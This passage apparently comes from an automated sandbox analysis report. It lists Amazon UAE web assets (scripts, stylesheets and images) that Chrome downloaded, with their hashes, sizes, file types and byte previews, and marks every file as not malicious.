                                                                                                                                                                                                        Preview:(function(b){var d=window.AmazonUIPageJS||window.P,c=d._namespace||d.attributeErrors,a=c?c("SmxCartAssets",""):d;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,d,c){b.when("A","a-secondary-view","Cart","ready").execute(function(a,b,d){a.declarative("smx-secondary-view","click",function(a){var e=a&&a.data||{},c=b.get("item-max-savings-ajax");c||(c=b.create(a.$target,{name:"item-max-savings-ajax",synchronous:!1,url:e.ajaxUrl+"?asin\x3d"+e.asin+"\x26isLightningDeal\x3d"+.e.isLightningDeal+"\x26merchantId\x3d"+e.merchantId}));c.show();d.logUECounter("item-max-savings-primary-ingress-click")});a.on("a:popover:afterHide:item-max-savings-ajax",function(){b.get("item-max-savings-ajax")&&b.remove("item-max-savings-ajax")})})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 109x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5586
                                                                                                                                                                                                        Entropy (8bit):7.934902876202241
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T4X7Zrvr+kWYAxguUzZ636+ik0wQVtN27tFRLlNRoGemE478C9z60E38P+:0Xpvr1xAzKZ63Ak5WQtFRLLRMm8C9ZEV
                                                                                                                                                                                                        MD5:8A383154DE48B0CA020E7BE7BEBEB602
                                                                                                                                                                                                        SHA1:769E0D9DB8315ABE302F275A1C27CD12CC618FC3
                                                                                                                                                                                                        SHA-256:0BF3A5446529418AE6FB60A23019D551674179739CD07B18D973E92F9B14C2CC
                                                                                                                                                                                                        SHA-512:5166AD25FDB20BC1BF5A410C95A662DD88960EE21C8E5E338796977E45BC11205850A6284338BB0169668D0985A495BB399C357E7EB79398B4C3B664483D3630
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........m.."...............................................................!.1.AQ.."aq..2B#R....b....%6su.CUt...................................................!R..1AQ.............?..tQE.E.P|.H4.K.....N..'..,..O...Qx..=Sr.mxt.b..D..8.L........oh.w.5....Fq..M.'..B-S{.R.t...@\:....S..}.J...J..G/....5.qskw.I.0........A.|.F...N..T..B.,3]..\E.". F..;6.>..Y..9.U.oo"......:..P....X.@2.....M......5....'..-.H....pRJ....n2..H...r.....h.....h...~.K.;T...@..m...X....z....^......1...??..o.;..m.. V.Wc..(....(.(.....|H..I..N....UQN`..fy?/....|j..]Gr...65.y.4..O.RU....y...U9.Cs.Fa.AKv6.u$.....a|.6N].2:.Cn$....b..t......D$>. t.2.P.,.....t[j1....4.5,bW.....)"4n"s.G...RK..B._.pQ.T,{>.DN....E....k.X..Aae$1...2.pq....6.%..v.....oqagf.K.C<...<.wc.#K..{.z.x.k8...s1.u...0T....>...c.g....U.Zu.6f..3.. .Io..$.:.[..]J.Y`Ao.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (312), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):312
                                                                                                                                                                                                        Entropy (8bit):5.0610226231601345
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:2LGHT3O/BHWYK7cidi61MRR1RcKMAuOLNhFys0NU3iBeHKeUIki:2k+/BHWYK7cUEc5OL0s0ahUIr
                                                                                                                                                                                                        MD5:CEE4A140BDD25DE758024B5972807BD0
                                                                                                                                                                                                        SHA1:837EAF911C0E7A1756F268491ED9B3328319F1B1
                                                                                                                                                                                                        SHA-256:C8D5B88634C6E632B62C5839E27E653182AFA6F95DC61BD078CE012041C8365D
                                                                                                                                                                                                        SHA-512:1F5CB78DCDE99F87E0BBEC4E72048609D423D9578226860564DA200917ACC9CD590AD58C8E8BF445D3EE421B53BDADA4E77B8E683704CB265990CF99E7F3A14C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/01DM-rg61+L.js?AUIClients/F3CollapsedCartAssets
                                                                                                                                                                                                        Preview:(function(b){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,a=d?d("F3CollapsedCartAssets",""):c;a.guardFatal?a.guardFatal(b)(a,window):a.execute(function(){b(a,window)})})(function(b,c,d){b.when("A").register("F3CartViewType",function(a){return{isCollapsedCart:function(){return!0}}})});
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):78371
                                                                                                                                                                                                        Entropy (8bit):7.869737476204653
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:4KSbNUo9i2YasYUnhQKX6E8fywYoslVX9hfYpKkfuf6BQ+BUAx:4TNUOi/ZYehaqoslJ9SpLuB6UAx
                                                                                                                                                                                                        MD5:D8EDDD493680E5EF02A9C7A6446C6EA2
                                                                                                                                                                                                        SHA1:8C18C554EA7DF8BC3F5F2E7A63CD4C032B6D4492
                                                                                                                                                                                                        SHA-256:E43B4D4AA387E5B0B3DA1AF92E5E7B336FD9B31D15C3FB93D3D2757862ECFEB0
                                                                                                                                                                                                        SHA-512:7B1D8AAE46D8B46526C67E1C3A9988D94B90C8C7DD4AA447289570E887AA9E36CBC34EA9697983C79597FB047EE536583B292B240020AD946F6AAEF673BC976D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/610a3+GT02L._SX1500_.jpg
                                                                                                                                                                                                        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8511
                                                                                                                                                                                                        Entropy (8bit):7.947802833386091
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:VOyCoBLWTs+YxOQ4Jdf79yQFgk3mYdUr9Iv/KIT8GlmGikAW:ZWAJ8Q4JNIQ+Siqn1jR
                                                                                                                                                                                                        MD5:0C47A9D573D45D04316A36CDD5A28BB3
                                                                                                                                                                                                        SHA1:961E059CC385683B900B6F13E587AB903A2A1467
                                                                                                                                                                                                        SHA-256:116E164DF9A8654B993DAAC01EFABE2B753FEF22E28CCA248C75A2B2FBF57E3A
                                                                                                                                                                                                        SHA-512:C8F8D9EF6859BBA5B15A196DB7522F15171B96879898C17C970209259235B6F55F26DA289DB5D1E17448CF711793E13CEC53841C512FE0D2A86C40147057E5E6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1...."AQq#2a...36Bsu...Rdr...4b..$%&CS................................................!1.2."AQ.q.#a....3CD................?..V.n_I.#C...E..-....G.bb......._......U..y......./".'Ht..?OB..j~..r...-..6<../.c'.....\...{.u.\.Kk.......oo...z...pnN..*sT...|..bi..z..+p.].=U...B.....r.......t..'........D.d....A..Fx.G..Csizn}r..?i:G.......;N..........yA..V....W..q..^.K.=......u....E.Cl.[.........3.f..:.}..7...Kf.....%............ev..4...hf..O..Iur.....&H.g........t..A...<._z...oH].x.[[{...E..e.R j.C.......q.|...Vw.Y8x\....ljk./.".4..R1|V+.G..j.....u3...?........{r.#I.n.:..=.c..%..|.i...]{c......ut...u+.A .H....hCV...Hm#Wak....w.....SvO.....c|M~I..2.j.. ....C.H........Z.)J.JR.R....(....J:...H#.R....L.......UeobE%G...a.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3525%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (542)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):12254
                                                                                                                                                                                                        Entropy (8bit):5.266663659098461
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:gqh6rMupPgt/hoSVEAmHto3GyZFP3RXFjFa4ZEFIvZPsi04ZqffOvZPEV1:gFV4HmN2ZXDjsvffgc
                                                                                                                                                                                                        MD5:B5C854FA1E601BFD190CB9B1528F3BD3
                                                                                                                                                                                                        SHA1:651DB75B7F37D4B41A326186B0685C2E1146002E
                                                                                                                                                                                                        SHA-256:A65C65158FB5A78F9208B79EB060EB8F014176E73248632F57BEC7B325EFDE53
                                                                                                                                                                                                        SHA-512:39F7DFCA7D57BB4DA70E01695D9A527CA5CED08170080F8C96F3196702D27C5D9F5EFB9238C534F1CCD753DBF48F8CDF23158D33EC087763E5B0B9E9B2DA842D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/31xJNEdmsXL.js?AUIClients/F3CommonCartAssets
                                                                                                                                                                                                        Preview:(function(e){var b=window.AmazonUIPageJS||window.P,t=b._namespace||b.attributeErrors,l=t?t("F3CommonCartAssets",""):b;l.guardFatal?l.guardFatal(e)(l,window):l.execute(function(){e(l,window)})})(function(e,b,t){function l(){var a=document.querySelector("#localMarketRecommendations");if(!a)return{};var d;return{preSuccessCallback:function(){d=a.getBoundingClientRect().top},successCallback:function(){var f=a.getBoundingClientRect().top-d;b.scroll(b.scrollX,b.scrollY+f)}}}e.when("A","F3CartSelectors",."localmarket-cart-actions","localmarket-accordion-view-state","localmarket-accordion-view-content").register("localmarket-accordion-view",function(a,d,f,m,e){function n(){var a=d.getOutOfStockElement();d.getSequentialCheckoutContainer()[0]?p(a[0],68):p(a[0],0)}function h(a,f){var g=d.getCollapsedCart(a),q=d.getCollapsedItemList(a),b=d.getAccordionItemList(a);e.isAccordionContentShown(a)&&0<g.length&&p(g[0],60);q.add(b).slideToggle(600,function(){m.enableToggling(a);f&&f()})}function k(a,f){f&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 512 x 256, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22428
                                                                                                                                                                                                        Entropy (8bit):7.910842269862625
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:qlbGl6f7R7T7rLr3s96g/W1BapndUdH6Qu3pDm+RaHHhKTOl1uk5xs:Lm7R7r/3pWW6pnudH6Qu5CZhKTA0+i
                                                                                                                                                                                                        MD5:BE418CBD22D8CD432FD8F3F6AE2ABD76
                                                                                                                                                                                                        SHA1:8A1EB36BDA141942C27CE5F2586CCB5EE17A2DA3
                                                                                                                                                                                                        SHA-256:F95648CD95B78DE088904519725C67FFF220F589DC045F19FFBA21550450409F
                                                                                                                                                                                                        SHA-512:85A442470444250A639C86753F1E9D3DC8C308D9F173C250CFEDACD8A1E16F4E3419DA0C7A6F19695CF6D1C25964B54E4FEE4193EED183B41C9E6043BDB827E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR..............N>U....PLTEGpL................79.78....... ;.(=..........+m.2I..;..$.qI.4:....%<. ;hjjcdehkkfiifiifhh.....@2?..?T..gjj...H.*l.O..>...O./;.2...ARB..............>N....>............:..D.).......................T..U$..(../.. ..$..$................*..,...........$..#..#..#..#..$..#..#..#........#..$..&............)}.)}.)}.)}.)}.)}.)}.)}.)}.)}.JI..H..K..K...<..vH..H...<...$*/......@@@...)1<......BGL...RUX...mxx.........`..K...<.E...%..C..X.D..w........<....uR.-<>A#/>:?C"$';>A;?C...-8D<?C8>C>@C$..............:>B;@D......&{..p.;...........$........................i......@?._I..W.....Q.G6.G6.G6.H6..-.ul.`.6d...........................................?@A?@A...3>H......V........#...vg.8!."....'..7.....@.....D..%.f%.f....^..]..].;........(......].......g...hV....tRNS.....sy..V..*..!1d..L...;.\v..D.....o.yo.N..o..'\.<{3...5..a..?...X(.......H.7P..h.........w....t....[..B...........................h...............*.`...@.....qQ......1.I..we..\....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5698
                                                                                                                                                                                                        Entropy (8bit):7.805913534141137
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TOIV1/EggtcYdqBZ/pRqfRC94MQJkpQrTMT33buafEZGlODLsDJtcF:KYgtcYdi/afRC94MNAgT33buafu3GJKF
                                                                                                                                                                                                        MD5:9A18DC286FB02D0BC6D06D0F6A755685
                                                                                                                                                                                                        SHA1:DC1891581B13BB9F345274D8450C37D2CBEA840B
                                                                                                                                                                                                        SHA-256:215C00190445A8F06F7C269B20FF829A8F36AE02DEC49AE7048B2C56A0F7932C
                                                                                                                                                                                                        SHA-512:E09ACDD3ABE8A45BE0DC8AE4552DC594AF4945735403EFB074145E5FB1DB7908458244C3C57EC7BF3AAC683A3CEAEE5E432B57EA8BF1DFDF4808BF6B899EF6D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/317I8lSNZAL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`......:.]...(......E.EZ...i..%.~Ov+*...........XCOF...g....C...n.q..q.a....|}:.WG..U..`.........9...Tb[?P...:5F...:.d[.Ke..=T[.Q..w...............b.....7.=....\.{..sH.z.G_.....Yz{...'..?.V.IY.h..QXr.3..............-j...Iz.]U.5'1.0..1...}.o1...j..-..Bs.7........:......H...z...$.G.................-j<..wLH.............5..Dh.......g.k.n\y..............Y..gy.Zk.-WQ..P.h/x@...>c.z.'..1%.w.]K>.~p^.g.V..r.*.1>o>.<...S..O.m.X.1...........KE...4.o.D....ZK.yv.~..H.."DzHQ.xH~.>]ww...RO..j.........1.}Eh...............-............................!1.. "0@#2ABP3Q............8.A.SkT..)+..ro.Y...g...?%......R..\T_.r"n.NkH..E.5.7".H..x..].E......z*`w+...T.+....2..O.zID..3..Cc(...7...$...u.....5.m.........4}...y...Y..:.]...'O.iru0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2759)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):28728
                                                                                                                                                                                                        Entropy (8bit):5.564730378619692
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:R5BVR5sW68ie/3oG7vwrwxwkOY9YwE7oxSvtfRmBPzwmvX+6+PKZ6BsGrZdRKF/f:rvsW68CsG4wK6IJw73W5
                                                                                                                                                                                                        MD5:1DB14C62CF94CAD93C582FC729B30957
                                                                                                                                                                                                        SHA1:0B3F45B2D87095B87F9858169829E51DFED62832
                                                                                                                                                                                                        SHA-256:220C21BE3EBE2F3874D22E4B2ED4C0F742F51E85015B53CB945AE4EC4BDA292E
                                                                                                                                                                                                        SHA-512:AE26317C0B92246183D8C5950F9AFC43E3D68D15B9DBD925ED6CCDD178D51500FD8807D6EA6352A714BAB48DF1059754D9A3EAA12E8C0AF22ECF2C6A2E87AADE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41X2u9j+foL.css
                                                                                                                                                                                                        Preview:..LiveAnnouncer-module__root_v_a22SWy0mwSVtL8ud5R{height:1px;left:-2px;overflow:hidden;position:absolute;top:0;width:1px}..EmptyGrid-module__root_ufzKK9naMirLhrAy5R_I{align-items:center;display:flex;flex-direction:column;min-height:500px}[data-theme=prime] .EmptyGrid-module__root_ufzKK9naMirLhrAy5R_I{color:#fff}.[data-theme=prime] .ConnectionProblem-module__message_JdHSKUuTcV1JaZ2wrCVD{color:#fff}..ErrorGrid-module__root_OsEbvqDKCdYp7U_xun29{min-height:500px}..SkeletonBox-module__skeleton_a6GhEwcDPXiWJYLvU_QA{display:flex}.SkeletonBox-module__image_SlmVv_UeW8DNZ5gwCnbv{background-color:var(--color-grey-1100);border-radius:4px;height:0;padding-top:100%;width:100%}.SkeletonBox-module__text_FdPBPxM8DD70yZYk_pyw{flex-direction:column;gap:4px}.SkeletonBox-module__textLine_FTAC56Qdl0a8SIEhhYEW{background-color:var(--color-grey-1100);border-radius:4px;height:20px}.SkeletonBox-module__horizontal_E8R5roGwEm2_4DFVpxCm{flex-direction:row}.SkeletonBox-module__increasedSpacing_myi5mlDPYFNNelkw1L2S{
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (531)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1406
                                                                                                                                                                                                        Entropy (8bit):5.225394152309612
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2T/sWFxVPIVq4pgY2Gq4pGBq4pA6ZfLZq2G97doVl6yeIIr5s66TU0ttoO:IFxu98BLPGRdoV8yeImf6TB9
                                                                                                                                                                                                        MD5:58F0FEDF5D8FC4BFA2E0841607D6EF40
                                                                                                                                                                                                        SHA1:CB25320DC51C8EC3E664057F39ACD4829D0FEBE2
                                                                                                                                                                                                        SHA-256:8D1569345AA7C0E58BE0571BA51676058515949F2BAE328D9D0A3304F73D8E31
                                                                                                                                                                                                        SHA-512:061CCDF6C8994CFD70BF137B6899C850AFBA8A9B78563FB069361D0A7C190650E42A17A3448DDFA179B32A0D7417F8D48F77B6E5DD7CB0A8CCC4E127F78B3227
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(d){var c=window.AmazonUIPageJS||window.P,g=c._namespace||c.attributeErrors,a=g?g("OctopusBrowsePageAssets",""):c;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,c,g){d.when("jQuery","ready").execute("apb-browse-refinements-checkbox-handler",function(a){a(".apb-browse-refinements").delegate(".apb-browse-refinements-checkbox","click",function(d){var b=a(d.currentTarget).closest("a").attr("href");b&&"#"!==b&&(d.preventDefault(),c.location.href=b)})});."use strict";d.when("A","jQuery","ready").execute("s-filters-declarative-action",function(a,d){a.declarative("s-nav-ref-image-layout-hover","mouseenter mouseleave",function(b){var f=b&&b.data,e=d(":first-child",b&&b.$currentTarget),a=null,c=null;b=b||{};"mouseenter"===b.type?(a=f.hoverOffsetX,c=f.hoverOffsetY):"mouseleave"===b.type&&(a=f.offsetX,c=f.offsetY);null!==a&&e.css("background-position",[a,"px ",c,"px"].join(""))})});"use strict";d.when("A","GLUXWidget").execute(function(a,d){a.on("pa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5960
                                                                                                                                                                                                        Entropy (8bit):7.925336296185083
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TUhN23J0t+FVc1ImMb6zM9KeLoP95zgH0DWempBXIXvb7vb7mkBMouKGytV64dzn:64Z0t31aV9Kb0HHem7XI//z7mk6kG86m
                                                                                                                                                                                                        MD5:A5DEEA0509DC93005F0E54A6ACA2D493
                                                                                                                                                                                                        SHA1:44945C72E805EFB9CD0636FDF1502052C797CE8B
                                                                                                                                                                                                        SHA-256:BDBDAE1E0A59B88F22438781831D971A597CC15814A06142B23978CFEF28C5B1
                                                                                                                                                                                                        SHA-512:7ED90AC663C95250FE1F85B722E40FA08AD8C3F3E8A7FC047AC8D4A67F227B6DB5AB3C7DD8B1D79B13EC4F07267A883E7F6A68578D3AF1E635BE8B45CCC895D5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Home/XCM_CUTTLE_1693198_3621419_372x232_2X_en_AE._SY116_CB582980067_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!."1.A.Qa..#q$2b....34Sc...R........................................................!1.AQ."2aq...b....BS................?..V...)JQ....)JQ....)JQ....)JQ....)JQ....)JQ....+Zk.............;k...e...F..Q......b..../......$.kA...{.o.H..31...O....\.= .6.v/..r....8<...?.QK......9+..*.<7....*.r...p...I....@.....WA..U..[c.$.....+.]j..+b~.K........yP.k.,...>~.8...........x..>$.@r...s.y.._...q.#..!....t..Q.Q. .g.<.i ...U......;P.=.......f.}P.z[...I.....U.-O...R.O. p.rYC.J....q.Q....[.(.2.3.1^[...9..8.U)...s#..<.g....u...=..9y|.........g-.......Ub6%....B...P*....Zi.T...v.............3...+B.......x..j..M.K..$k..ex..UU.Km...U_.FX..f.c..Qs;.v.M.s.ij......Vm"y.-ey.%.?%AT.,;...T.4...}}..8..t..1..m.K.......h....H...w<..U`....x.c.....].|.V.....I..n..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x172, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3801
                                                                                                                                                                                                        Entropy (8bit):7.7266210355638245
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0CLYmKosh6G8ggwtEKcXqf19URW5ayfdD5g5sYl36mR3hdzudEOsDK81JT/FeT:T5LYm5o8KUeERF4SeoKmzd6B2jFd74
                                                                                                                                                                                                        MD5:10D53C6C43179408DA23436B8A49CA86
                                                                                                                                                                                                        SHA1:217051F25CE1FB263AFC8B59C8B671D7CA4F6B11
                                                                                                                                                                                                        SHA-256:839A1C4A45587466FFA0124643FAF86717D46C04D732D47A0A0D45EE0EAB3F8A
                                                                                                                                                                                                        SHA-512:B53FCEABCFF3DBA4776BADE385A7A6144040A966809A7087D2FC9CB0B245DA841A795CC4880D3923066383FC01066AE3108B34B0391022313B1FE32048A92767
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/21SFlGXwMGL.AC_SX250.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........../...............................................................<h.m'.|,.'7......o'.........Z...u..|..........^......v.r`...!.Tww'..z.DA....'.....ic.z..V.}vq.Y.....x.....Yz.0....&.X..^.iR...Q.i......H."........./.}vzH8..}_.i.lNNcM..c.....ay}tcd...,6.CO..l.R..db.wH..!....z7...6...1.S.........i"^...2....I/.ch..j..F.i.Z....bj...8.S..MOz.o.J.....9...`..........c.....}..M..bPT.F.....0p..~J..XQ.#Dd......../r..<..I.6A..D38yM.]O6^R...[.'H&..#.nF....`....O[.7._.\.r...HA.$..Y.F\..$IE.u..............s...wo....(..\^H.3ty.]s..........."9w.>..O.....k{ .......,......................... !.."012@#4BQ.3RA.............X../.]^...y....G...L.M...).C"N.gz ......v<..3.!........~..X...".'e........&.R.f...;..g..A.f^...V].:.1...#}.....?...z!.px.....C...[.....K._...c.v1.n.......$.7......J..4y.\.P.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8370
                                                                                                                                                                                                        Entropy (8bit):7.944534208073143
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:WX7n9ZQ6xbiaJhUTXPuUSX0+anUmqPQFmhhrOmAPEJppdt:67n96kO9joUn4oFmKmAMDpX
